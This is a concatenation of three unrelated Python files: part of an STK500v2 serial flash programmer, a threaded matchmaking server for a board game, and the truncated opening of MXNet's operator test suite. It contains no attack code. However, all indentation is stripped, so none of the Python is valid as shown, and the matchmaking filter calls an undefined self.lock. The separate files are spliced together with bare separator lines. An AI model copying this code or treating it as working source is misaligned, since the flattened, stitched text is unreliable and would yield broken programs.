#Leave ISP does not reset the serial port, only resets the device, and returns the serial port after disconnecting it from the programming interface.
# This allows you to use the serial port without opening it again.
def leaveISP(self):
if self.serial is not None:
if self.sendMessage([0x11]) != [0x11, 0x00]:
raise ispBase.IspError("Failed to leave programming mode")
ret = self.serial
self.serial = None
return ret
return None
def isConnected(self):
return self.serial is not None
def hasChecksumFunction(self):
return self._has_checksum
def sendISP(self, data):
recv = self.sendMessage([0x1D, 4, 4, 0, data[0], data[1], data[2], data[3]])
return recv[2:6]
def writeFlash(self, flash_data):
#Set load addr to 0, in case we have more then 64k flash we need to enable the address extension
page_size = self.chip["pageSize"] * 2
flash_size = page_size * self.chip["pageCount"]
Logger.log("d", "Writing flash")
if flash_size > 0xFFFF:
self.sendMessage([0x06, 0x80, 0x00, 0x00, 0x00])
else:
self.sendMessage([0x06, 0x00, 0x00, 0x00, 0x00])
load_count = (len(flash_data) + page_size - 1) / page_size
for i in range(0, int(load_count)):
self.sendMessage([0x13, page_size >> 8, page_size & 0xFF, 0xc1, 0x0a, 0x40, 0x4c, 0x20, 0x00, 0x00] + flash_data[(i * page_size):(i * page_size + page_size)])
if self.progress_callback is not None:
if self._has_checksum:
self.progress_callback(i + 1, load_count)
else:
self.progress_callback(i + 1, load_count * 2)
def verifyFlash(self, flash_data):
if self._has_checksum:
self.sendMessage([0x06, 0x00, (len(flash_data) >> 17) & 0xFF, (len(flash_data) >> 9) & 0xFF, (len(flash_data) >> 1) & 0xFF])
res = self.sendMessage([0xEE])
checksum_recv = res[2] | (res[3] << 8)
checksum = 0
for d in flash_data:
checksum += d
checksum &= 0xFFFF
if hex(checksum) != hex(checksum_recv):
raise ispBase.IspError("Verify checksum mismatch: 0x%x != 0x%x" % (checksum & 0xFFFF, checksum_recv))
else:
#Set load addr to 0, in case we have more then 64k flash we need to enable the address extension
flash_size = self.chip["pageSize"] * 2 * self.chip["pageCount"]
if flash_size > 0xFFFF:
self.sendMessage([0x06, 0x80, 0x00, 0x00, 0x00])
else:
self.sendMessage([0x06, 0x00, 0x00, 0x00, 0x00])
load_count = (len(flash_data) + 0xFF) / 0x100
for i in range(0, int(load_count)):
recv = self.sendMessage([0x14, 0x01, 0x00, 0x20])[2:0x102]
if self.progress_callback is not None:
self.progress_callback(load_count + i + 1, load_count * 2)
for j in range(0, 0x100):
if i * 0x100 + j < len(flash_data) and flash_data[i * 0x100 + j] != recv[j]:
raise ispBase.IspError("Verify error at: 0x%x" % (i * 0x100 + j))
def sendMessage(self, data):
message = struct.pack(">BBHB", 0x1B, self.seq, len(data), 0x0E)
for c in data:
message += struct.pack(">B", c)
checksum = 0
for c in message:
checksum ^= c
message += struct.pack(">B", checksum)
try:
self.serial.write(message)
self.serial.flush()
except SerialTimeoutException:
raise ispBase.IspError("Serial send timeout")
self.seq = (self.seq + 1) & 0xFF
return self.recvMessage()
def recvMessage(self):
state = "Start"
checksum = 0
while True:
s = self.serial.read()
if len(s) < 1:
raise ispBase.IspError("Timeout")
b = struct.unpack(">B", s)[0]
checksum ^= b
if state == "Start":
if b == 0x1B:
state = "GetSeq"
checksum = 0x1B
elif state == "GetSeq":
state = "MsgSize1"
elif state == "MsgSize1":
msg_size = b << 8
state = "MsgSize2"
elif state == "MsgSize2":
msg_size |= b
state = "Token"
elif state == "Token":
if b != 0x0E:
state = "Start"
else:
state = "Data"
data = []
elif state == "Data":
data.append(b)
if len(data) == msg_size:
state = "Checksum"
elif state == "Checksum":
if checksum != 0:
state = "Start"
else:
return data
def portList():
ret = []
import _winreg # type: ignore
key=_winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,"HARDWARE\\DEVICEMAP\\SERIALCOMM") #@UndefinedVariable
i=0
while True:
try:
values = _winreg.EnumValue(key, i) #@UndefinedVariable
except:
return ret
if "USBSER" in values[0]:
ret.append(values[1])
i+=1
return ret
def runProgrammer(port, filename):
""" Run an STK500v2 program on serial port 'port' and write 'filename' into flash. """
programmer = Stk500v2()
programmer.connect(port = port)
programmer.programChip(intelHex.readHex(filename))
programmer.close()
def main():
""" Entry point to call the stk500v2 programmer from the commandline. """
import threading
if sys.argv[1] == "AUTO":
Logger.log("d", "portList(): ", repr(portList()))
for port in portList():
threading.Thread(target=runProgrammer, args=(port,sys.argv[2])).start()
time.sleep(5)
else:
programmer = Stk500v2()
programmer.connect(port = sys.argv[1])
programmer.programChip(intelHex.readHex(sys.argv[2]))
sys.exit(1)
if __name__ == "__main__":
main()
|
__main__.py
|
"""
Multi-threaded match-making game server
"""
import os
import random
from datetime import datetime
import threading
from collections import defaultdict
from referee.log import StarLog
from referee.game import play, IllegalActionException, COLOURS, NUM_PLAYERS
from benchmark import RandomPlayer, GreedySpreadPlayer
from battleground.protocol import DisconnectException, ProtocolException
from battleground.protocol import Connection, MessageType as M
from battleground.protocol import DEFAULT_SERVER_PORT
# The following channels are reserved, and choosing them results in playing
# a game with server-controlled players:
SPECIAL_CHANNELS = {
'random': (lambda p: [ServerPlayer(RandomPlayer, 'random_bot'), p]),
'greedy': (lambda p: [ServerPlayer(GreedySpreadPlayer, 'greedy_bot'), p]),
}
# Print at a higher level of verbosity, including some debugging information
DEBUG = False # The matchmaking system seems to be working well from 2019.
# # # #
# Main thread: listen for incoming connections.
#
#
def main():
out = StarLog(level=1+DEBUG, timefn=lambda: f'Thread-0 {datetime.now()}')
out.comment("initialising server", depth=-1)
# set up a shared matchmaking pool
pool = MatchmakingPool(num_players=NUM_PLAYERS,
special_channels=SPECIAL_CHANNELS)
# listen for connections incoming on PORT:
try:
# Host of "" allows all incoming connections on the chosen port
connections = Connection.iter_listen(host="", port=DEFAULT_SERVER_PORT)
out.comment(f"listening on port {DEFAULT_SERVER_PORT}...")
for connection, address in connections:
# repeatedly accept a new connection, and hand off to a new thread
out.comment("new client connected: ", address)
out.comment("starting a new thread to handle this client...")
handler = threading.Thread(target=servant, args=(connection, pool))
handler.daemon = True # so that this thread exits when main exits
handler.start()
except KeyboardInterrupt:
print() # end line
out.comment("bye!")
# # # #
# Worker thread: Coordinate the matchmaking process and, if the client is the
# player that allows a game to begin, coordinate that game to conclusion.
#
def servant(connection, pool):
# (Each thread gets own print function which includes its thread number)
timefn = lambda: f'{threading.current_thread().name} {datetime.now()}'
out = StarLog(level=1+DEBUG, timefn=timefn)
out.comment("hello, world!")
# # #
# Initiate connection
#
# At your service, client! Let us begin the protocol
# First, could you kindly send me a PLAY request containing your
# name and matchmaking channel?
out.comment("begin communication with player", depth=-1)
out.comment("waiting for PLAY request...")
try:
playmsg = connection.recv(M.PLAY)
out.comment("successfully received PLAY request:", playmsg)
out.comment("sending OKAY back.")
connection.send(M.OKAY)
except DisconnectException:
out.comment("client disconnected. bye!")
connection.disconnect()
return
except ProtocolException as e:
out.comment("protocol error! that was unexpected...? bye!")
connection.disconnect()
return
# Now that you're officially a player, let's wrap you up in an object so
# that we won't forget your name.
new_player = NetworkPlayer(connection, playmsg['name'])
# And we'll need to note that channel for matchmaking purposes!
channel = playmsg['channel']
# # #
# Conduct matchmaking
#
# Okay then. Now, if it pleases you just to wait one moment, I'll look for
# some suitable opponents for you to play with...
out.comment("looking for opponents...", depth=-1)
try:
players = pool.match(channel, new_player, out)
out.comment("opponents found!")
except NotEnoughPlayers:
# I'm afraid this is as far as I can take you, good sir/madam.
# If you wait here for just a short time, I'm sure another thread
# will come by and pick you up quite soon.
# It has been my eternal pleasure. Farewell~ Your humble servant.
out.comment("leaving in pool for another thread. bye~!")
return
# # #
# Initialise all players, prepare for game
#
# Splendid! Between the few of you, we have enough players for a game!
# Who will take the first turn? Let us cast the proverbial die:
out.comment("randomly assigning colours to players...")
random.shuffle(players)
cols_players = list(zip(COLOURS, players))
# Then, shall we introduce you to one another?
col_name_map = {colour: player.name for colour, player in cols_players}
for colour, player in cols_players:
player.game(col_name_map, out.comment)
# What name shall we give to this glorious playing?
player_names = '_and_'.join(p.name for p in players)
timestamp = str(datetime.now())[:19].replace(' ', '_').replace(':', '-')
game_name = f"logs/game_at_{timestamp}_with_{player_names}.txt"
# Attempt to make sure there is a 'logs' folder ready for the game log
try: os.mkdir('logs')
except: pass
# # #
# Play game, handle result
#
# Without further ado, let us begin!
try:
result = play(players,
logfilename=game_name,
out_function=out.comment,
print_state=False)
# What a delightful result! I hope that was an enjoyable game
# for all of you. Let's share the final result.
out.comment("game over!", depth=-1)
out.comment(result)
out.comment("sending out result...")
for player in players:
player.game_over(result=result)
except IllegalActionException:
# Ah! The game has ended early. We had better
# make sure everyone is on the same page:
out.comment("game error", depth=-1)
out.comment("game error: invalid action")
for player in players:
player.game_over(result="game error: invalid action")
except DisconnectException:
# In the unfortunate event of a disconnection, we had better
# make sure everyone is on the same page:
out.comment("connection error", depth=-1)
out.comment("a client disconnected")
for player in players:
try:
player.error(reason="opponent disconnected")
except BrokenPipeError:
# this connection must have been the one that reset; skip it
continue
except ProtocolException as e:
out.comment("protocol error!", depth=-1)
out.comment(e)
out.comment("a client did something unexpected")
for player in players:
player.error(reason="opponent broke protocol")
# # #
# Terminate all players
#
# One way or another, that's the end of this meeting. Until next time, my
# good friends! It has been my deepest pleasure~
out.comment("disconnection", depth=-1)
out.comment("disconnecting players...")
for player in players:
player.disconnect()
out.comment("end of thread. bye~")
# # #
# Player wrappers
#
class NetworkPlayer:
"""A Player wrapper for network-controlled players"""
def __init__(self, connection, name):
self.connection = connection
self.name = name
self.player_str = f"{self.name} (not yet initialised)"
def ping(self, timeout=None):
self.connection.send(M.OKAY)
self.connection.recv(M.OKAY, timeout=timeout)
def game(self, colour_name_map, log_function):
self.log = log_function
self.log(self.player_str, 'sending GAME')
self.connection.send(M.GAME, **colour_name_map)
def init(self, colour):
self.colour = colour
self.player_str = f"{self.name} ({colour})"
self.log(self.player_str, 'sending INIT')
self.connection.send(M.INIT, colour=colour)
self.connection.recv(M.OKAY)
def action(self):
self.log(self.player_str, 'sending TURN')
self.connection.send(M.TURN)
self.log(self.player_str, 'waiting for ACTN')
actnmsg = self.connection.recv(M.ACTN)
self.log(self.player_str, 'received ACTN:', actnmsg)
return actnmsg['action']
def update(self, colour, action):
self.log(self.player_str, 'sending UPD8')
self.connection.send(M.UPD8, colour=colour, action=action)
self.log(self.player_str, 'waiting for OKAY')
self.connection.recv(M.OKAY)
def game_over(self, result):
self.log(self.player_str, 'sending OVER')
self.connection.send(M.OVER, result=result)
def error(self, reason):
self.log(self.player_str, 'sending ERRO')
self.connection.send(M.ERRO, reason=reason)
def disconnect(self):
self.log(self.player_str, 'disconnecting')
self.connection.disconnect()
class ServerPlayer:
"""A Player wrapper for locally-controlled players"""
def __init__(self, Player, name):
self.Player = Player
self.name = name
def game(self, _colour_name_map, log_function):
self.log = log_function
def init(self, colour):
self.colour = colour
self.player_str = f"{self.name} ({colour})"
self.log(self.player_str, 'initialising', colour)
self.player = self.Player(colour)
def action(self):
self.log(self.player_str, 'asking for action')
action = self.player.action()
self.log(self.player_str, 'got:', action)
return action
def update(self, colour, action):
self.log(self.player_str, 'updating with', colour, action)
self.player.update(colour, action)
def game_over(self, result):
pass
def error(self, reason):
pass
def disconnect(self):
pass
# # #
# Matchmaking code
#
class MatchmakingPool:
"""
A collection of per-channel waiting lists, with concurrent access control.
Submit your player to a channel with the match method, and receive either
a NotEnoughPlayers exception or a list of num_players previously deposited.
Notes:
* Thread safe (I think)
* Does not automatically clear stale connections out of channel waiting
lists until a new player is submitted to that channel. Therefore, an
attack exists where a client can run up memory usage by repeatedly
submitting players to obscure channels, and then disconnecting.
"""
def __init__(self, num_players, special_channels):
self._lock = threading.RLock()
self._waiting = defaultdict(list)
self.num_players = num_players
self.special_channels = special_channels
def match(self, channel, new_player, out):
"""
Submit a 'new_player' (Player wrapper) to look for games on 'channel'.
If there are already players waiting from previous match calls, or if
'channel' is a special channel, then return a full list of players
(including 'new_player').
If there are not enough players yet, leave 'new_player' in the pool
for a future match call and raise a NotEnoughPlayers exception.
"""
# if it's a special channel, we don't need to wait for players,
# the server can provide some:
if channel in self.special_channels:
return self.special_channels[channel](new_player)
# otherwise, we do need to match-make as usual:
with self._lock:
out.debug("matchmaking pool before filter:", self._waiting)
# clean out any players who have since disconnected
channel_waiting = self._filter(channel, out)
# deposit THIS new player in the queue too,
channel_waiting.append(new_player)
# okay, are there enough players waiting to play a game?
if len(channel_waiting) < self.num_players:
# no; alert the caller
out.comment("not enough players!")
out.debug("pool after filter:", self._waiting)
raise NotEnoughPlayers()
else:
# yes! extract this queue from the waiting pool
del self._waiting[channel]
out.comment("match found!")
out.debug("pool after filter:", self._waiting)
# and return these players to the caller!
return channel_waiting
def _filter(self, channel, out=None):
with self.lock:
still_waiting = []
for player in self._waiting[channel]:
try:
player.ping(timeout=10)
# contact! they're still online! re-add them to the pool:
still_waiting.append(player)
except (OSError,
BrokenPipeError, # the connection has gone stale?
DisconnectException, # the client closed the connection
ProtocolException # the client... did what?
) as e:
# in any case, close this connection and don't keep this
# client in the pool.
if out is not None:
out.comment("ditching client", player, "due to",
e.__class__.__name__, e)
player.connection.disconnect()
self._waiting[channel] = still_waiting
return still_waiting
class NotEnoughPlayers(Exception):
"""For when there are not enough players waiting in a particular channel"""
if __name__ == '__main__':
main()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if type(grad_req) is dict and grad_req['data'] == 'null' or grad_req == 'null':
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
else:
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
check_rnn_consistency(fused, stack, T, N, I, H, {'data': 'add', 'parameters': 'null'})
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
